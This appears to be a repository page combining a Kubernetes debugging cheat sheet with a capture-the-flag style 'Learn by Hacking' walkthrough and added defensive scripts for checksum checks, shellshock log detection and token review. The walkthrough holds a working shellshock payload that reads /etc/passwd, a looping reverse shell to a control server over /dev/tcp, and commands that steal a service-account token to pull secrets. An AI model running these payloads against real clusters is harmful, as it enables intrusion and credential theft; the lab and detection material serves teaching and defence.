Repository contents: `Learn by Hacking.pdf` (https://raw.githubusercontent.com/calinah/learn-by-hacking-kccn/HEAD/Learn by Hacking.pdf) and `k8s_cheatsheet.md`, reproduced below.

# k8s_cheatsheet.md

This guide has been created to help engineers debug applications that are deployed into Kubernetes and not behaving correctly.

## Pod & Container Introspection

| Command | Description |
| ------------------------------------------------------------ | ------------------------------------------------------------ |
| `kubectl get pods` | lists the pods in the current namespace |
| `kubectl get pods -w` | watches pods continuously |
| `kubectl describe pod <pod>` | describe a pod |
| `kubectl get rc` | list the replication controllers |
| `kubectl get services` or `kubectl get svc` | list the services in the current namespace |
| `kubectl describe service <service>` or `kubectl describe svc <service>` | describe a service |
| `kubectl delete pod <pod>` | delete a pod |
| `kubectl get pods -o wide -w` | watch pods continuously and show extra info such as IP addresses and the nodes the pods are provisioned on |

## Cluster Introspection

| Command | Description |
| :----------------------------- | :----------------------------------------------------------- |
| `kubectl version` | get version info |
| `kubectl cluster-info` | get cluster info |
| `kubectl config view` | get cluster config |
| `kubectl describe node <node>` | output info about a node |
| `kubectl get nodes -w` | watch nodes continuously |
| `kubectl get nodes -o wide` | gives a detailed view of nodes, including internal and external IP addresses |

## Debugging

| Command | Description |
| ------------------------------------------------------------ | ------------------------------------------------------------ |
| `kubectl exec -ti <pod> [-c <container>] -- <command>` | execute a command in a pod, optionally in a given container |
| `klog <pod> [-c <container>]` or `kubectl logs -f <pod> [-c <container>]` | get the logs of a given pod, or optionally of one of its containers |

## Networking

| Command | Description |
| ------------------------------------------------------------ | ----------------------------------------- |
| `kubectl exec -ti <pod> -- /bin/sh -c "curl -v telnet://<host>:<port>"` | test TCP connectivity between services |

## Other resources

- Check whether an action is allowed in your Kubernetes cluster (see the `auth can-i` calls in Part 2 below).

Use `amicontained` to find out what container runtime you're using as well as what capabilities your container has.

```
# Export the sha256sum for verification.
$ export AMICONTAINED_SHA256="4e32545f68f25bcbcd4cce82743e916a054e1686df44fab68420fc9f94f80b21"

# Download and check the sha256sum (sha256sum -c expects two spaces between digest and path).
$ curl -fSL "https://github.com/genuinetools/amicontained/releases/download/v0.4.7/amicontained-linux-amd64" -o "/usr/local/bin/amicontained" \
	&& echo "${AMICONTAINED_SHA256}  /usr/local/bin/amicontained" | sha256sum -c - \
	&& chmod a+x "/usr/local/bin/amicontained"

$ echo "amicontained installed!"

# Run it!
$ amicontained -h
```

Add these functions to your environment so that you can scan for open ports:

```
sudo apt-get update
sudo apt-get install nmap

# Scan the ports commonly used by Kubernetes components (API server, etcd, kubelet, cAdvisor, Weave, ...).
nmap-kube () {
    nmap --open -T4 -A -v -Pn -p 443,2379,4194,6782-6784,6443,8443,8080,9099,10250,10255,10256 "${@}"
}

# Derive the local /24 from eth0 and scan it together with a few common cluster ranges.
nmap-kube-discover () {
    local LOCAL_RANGE=$(ip a | awk '/eth0$/{print $2}' | sed 's,[0-9][0-9]*/.*,*,');
    local SERVER_RANGES=" ";
    SERVER_RANGES+="10.0.0.1 ";
    SERVER_RANGES+="10.0.1.* ";
    SERVER_RANGES+="10.*.0-1.* ";
    nmap-kube ${SERVER_RANGES} "${LOCAL_RANGE}"
}
nmap-kube-discover
```

## Part 1: compromise via shellshock

Useful commands for finding open ports:

```
command nmap -Pn -T4 -F --open <host>
# scanning every port; more is open
command nmap -Pn -T4 --open -p 0-65535 <host>
command nmap -Pn -T4 --open -p 30081 <host>
```

1. Check shellshock

```
curl http://<host>:30081/cgi-bin/stats -H 'user-agent: () { :; }; echo; echo; 2>&1 /bin/bash -c "cat /etc/passwd"'
```

2. Create a control server to use as a reverse shell endpoint

This requires any node with a public IP (a DigitalOcean server would do).

```
# replace `controlplane` with a host that you can SSH to
ssh controlplane ip a

# replace 1234 with a port that is routable on the host you have SSH'd into
while :; do ssh controlplane ncat --listen 1234 --output $(mktemp /tmp/hack-XXXX.log); done
```

3. shellshock in

```
curl http://<host>:30081/cgi-bin/stats -H 'user-agent: () { :; }; echo; echo; 2>&1 /bin/bash -c "echo hello"'
```

Hardcore version:

```
while :; do curl http://<host>:30081/cgi-bin/stats -H 'user-agent: () { :; }; echo; echo; 2>&1 /bin/bash -c "test -f /tmp/k || wget -O /tmp/k https://storage.googleapis.com/kubernetes-release/release/v1.11.2/bin/linux/amd64/kubectl && chmod +x /tmp/k && /tmp/k version; df -h; while :; do nohup bash -i >& /dev/tcp/<control-server-ip>/1234 0>&1; sleep 1; done"'; done
```

## Part 2: kubectl SA: steal secret with ssh password in (flag)

### Steps

1. On the control server, or via individual shellshock commands, search for secrets:

```
df -h
cat /run/secrets/kubernetes.io/serviceaccount/token; echo

/tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --server https://kubernetes.default.svc --insecure-skip-tls-verify get nodes

/tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --server https://kubernetes.default.svc --insecure-skip-tls-verify auth can-i get secrets --namespace kube-system
```

2. Pull secrets from the API server for this namespace (there's a service account mounted that can read kube-system):

```
/tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --server https://kubernetes.default.svc --insecure-skip-tls-verify get secrets -n shellshock
```

3. We've found secrets, now decode them

> the first way requires a manual base64 decode, the second is a one-liner

```
/tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --request-timeout 5s --server https://kubernetes.default.svc --insecure-skip-tls-verify get secret my-secret -o yaml -n shellshock

/tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --server https://kubernetes.default.svc --insecure-skip-tls-verify get secret my-secret -n shellshock -o 'go-template={{index .data "ssh_password"}}' | base64 -d; echo
```

4. Find the password for the ssh server in the flag

5. Write the password to a local file to win (or just tell ControlPlane!) TODO(low): write test for this

```
echo 'What kind of plane is it?' > /tmp/flag
```
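The `amicontained` install snippet under "Other resources" pins a SHA-256 and lets `sha256sum -c` gate the `chmod`. The following is an added example, not code from the cheat sheet or from the amicontained project, that packages the same supply-chain check as a reusable function which fails closed: on a mismatch the downloaded file is deleted and nothing is installed. The function names (`sha256_of`, `install_verified`) and the temp-dir demonstration file are this example's own; it assumes a POSIX `sh` with either GNU `sha256sum` or BSD `shasum` on the path.

```shell
#!/bin/sh
# Added example (not from the cheat sheet or the amicontained project):
# install a downloaded binary only if its SHA-256 matches the pinned value.
# Assumes a POSIX sh plus either GNU sha256sum or BSD shasum.

sha256_of() {
    # Print the hex SHA-256 digest of the file given as $1.
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

install_verified() {
    # $1 = downloaded file, $2 = expected SHA-256 (hex), $3 = destination path.
    # Returns 0 and installs on a match; returns 1 and removes the download on a mismatch,
    # so a tampered or truncated download never reaches the destination.
    src="$1"; expected="$2"; dest="$3"
    actual="$(sha256_of "$src")"
    if [ "$actual" != "$expected" ]; then
        echo "checksum mismatch for $src: expected $expected, got $actual" >&2
        rm -f "$src"
        return 1
    fi
    install -m 0755 "$src" "$dest" 2>/dev/null || { cp "$src" "$dest" && chmod 0755 "$dest"; }
    return 0
}

# Constructed demonstration: a fake "binary" in a temp dir stands in for a real download.
demo_dir="$(mktemp -d)"
printf '#!/bin/sh\necho hello\n' > "$demo_dir/tool.download"
good="$(sha256_of "$demo_dir/tool.download")"
bad="0000000000000000000000000000000000000000000000000000000000000000"

# Correct pin: the file is installed.
install_verified "$demo_dir/tool.download" "$good" "$demo_dir/tool" && echo "installed: $demo_dir/tool"

# Wrong pin: the install is refused and the download is removed.
cp "$demo_dir/tool" "$demo_dir/tool2.download"
install_verified "$demo_dir/tool2.download" "$bad" "$demo_dir/tool2" || echo "refused (expected)"
```

For a real download, fetch with `curl -fSL -o "$tmp" "$url"` first and then call `install_verified "$tmp" "$pinned_sha256" /usr/local/bin/tool`; keeping the pin in a variable or file next to the script, as the original snippet does with `AMICONTAINED_SHA256`, is what makes the check meaningful.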
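Part 1 relies on the CGI endpoint passing the `User-Agent` header into an unpatched bash as an environment variable, which is what the `() { :; };` prefix triggers. As an added example from the defender's side (not part of the walkthrough), the script below flags that pattern in web server access log lines and runs the widely published self-test to see whether the local bash still evaluates function definitions from the environment. The log lines are constructed for the demo; the function names are this example's own.

```shell
#!/bin/sh
# Added example (not part of the walkthrough): defender-side shellshock checks.
# (1) flag request log lines whose header values carry the "() {" function prefix;
# (2) test whether the local bash is still unpatched.
# The sample log lines below are constructed, not real traffic.

# Regex for the shellshock trigger: "()" followed by optional whitespace and "{".
SHELLSHOCK_RE='\(\)[[:space:]]*\{'

shellshock_hits() {
    # Print only the log lines matching the trigger pattern; input on stdin.
    grep -E "$SHELLSHOCK_RE"
}

shellshock_hit_count() {
    # Count matching lines (input on stdin); always exits 0 so callers can use the number.
    grep -Ec "$SHELLSHOCK_RE" || true
}

bash_vulnerable_to_shellshock() {
    # Returns 0 if the installed bash runs the command trailing a function definition
    # imported from the environment (unpatched), 1 if patched, 2 if bash is absent.
    command -v bash >/dev/null 2>&1 || return 2
    out="$(env x='() { :;}; echo vulnerable' bash -c 'echo test' 2>/dev/null)"
    case "$out" in
        *vulnerable*) return 0 ;;
        *) return 1 ;;
    esac
}

# Constructed sample access log: two benign requests, two shellshock probes
# (the third line reuses the probe shown in Part 1 step 1).
SAMPLE_LOG='10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /cgi-bin/stats HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2020:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/7.58.0"
10.0.0.9 - - [01/Jan/2020:10:00:02 +0000] "GET /cgi-bin/stats HTTP/1.1" 200 2048 "-" "() { :; }; echo; echo; /bin/bash -c \"cat /etc/passwd\""
10.0.0.9 - - [01/Jan/2020:10:00:03 +0000] "GET /cgi-bin/stats HTTP/1.1" 200 2048 "-" "(){ :;}; /bin/bash -c \"id\""'

echo "shellshock probes in sample log:"
printf '%s\n' "$SAMPLE_LOG" | shellshock_hits
echo "count: $(printf '%s\n' "$SAMPLE_LOG" | shellshock_hit_count)"

if bash_vulnerable_to_shellshock; then
    echo "local bash: VULNERABLE, patch it"
else
    echo "local bash: patched (or not installed)"
fi
```

On a real host, pipe the web server's access log into `shellshock_hits`; a hit against a `/cgi-bin/` path from a source that otherwise sends normal user agents is the signal worth alerting on, and `bash_vulnerable_to_shellshock` tells you whether that request could have succeeded on the node it reached.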
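Part 2 step 1 starts by reading `/run/secrets/kubernetes.io/serviceaccount/token` and then probing the API with `auth can-i`. That token is a JWT whose payload names the namespace and service account it belongs to, so an engineer reviewing a pod can read the identity straight out of the token and scope an RBAC review to it. The following added example (not from the walkthrough) decodes the payload with plain `sh`, `cut`, `base64` and `grep`; the token it decodes is constructed here with a dummy signature, and the helper names are this example's own. The suggested follow-up command it prints uses kubectl's impersonation flag `--as` with `auth can-i --list`, which it does not execute.

```shell
#!/bin/sh
# Added example (not from the walkthrough): read the service-account identity out of a
# mounted token by decoding the JWT payload, without contacting the API server.
# The token below is constructed with a dummy signature; no cluster is needed.

b64url_decode() {
    # Decode unpadded base64url from $1 to stdout (JWT segments use this alphabet).
    s="$(printf '%s' "$1" | tr -- '-_' '+/')"
    case $(( ${#s} % 4 )) in
        2) s="${s}==" ;;
        3) s="${s}=" ;;
    esac
    printf '%s' "$s" | base64 -d 2>/dev/null || printf '%s' "$s" | base64 -D
}

b64url_encode() {
    # Encode $1 as unpadded base64url; only used here to build the sample token.
    printf '%s' "$1" | base64 | tr -d '\n=' | tr -- '+/' '-_'
}

jwt_payload() {
    # Print the JSON payload (second dot-separated segment) of the JWT in $1.
    b64url_decode "$(printf '%s' "$1" | cut -d. -f2)"
}

jwt_claim() {
    # Print the string value of claim $2 from JWT $1 (flat string claims only).
    jwt_payload "$1" | grep -o "\"$2\":\"[^\"]*\"" | head -n1 | sed 's/.*:"//; s/"$//'
}

# Constructed sample token with the claim names a legacy service-account token carries.
HEADER='{"alg":"RS256","typ":"JWT"}'
PAYLOAD='{"iss":"kubernetes/serviceaccount","kubernetes.io/serviceaccount/namespace":"shellshock","kubernetes.io/serviceaccount/service-account.name":"default","sub":"system:serviceaccount:shellshock:default"}'
SAMPLE_TOKEN="$(b64url_encode "$HEADER").$(b64url_encode "$PAYLOAD").dummysig"

ns="$(jwt_claim "$SAMPLE_TOKEN" "kubernetes.io/serviceaccount/namespace")"
sa="$(jwt_claim "$SAMPLE_TOKEN" "kubernetes.io/serviceaccount/service-account.name")"
echo "token identity: system:serviceaccount:${ns}:${sa}"
# Review what that identity may do, from an admin context (printed, not run here):
echo "next: kubectl auth can-i --list --as=system:serviceaccount:${ns}:${sa} -n ${ns}"
```

On a real pod the input is `$(cat /run/secrets/kubernetes.io/serviceaccount/token)`; if the mounted identity turns out to be one that can read `kube-system` secrets, as in the walkthrough, the fix is to bind a narrower Role to the workload's service account or to set `automountServiceAccountToken: false` on pods that never talk to the API.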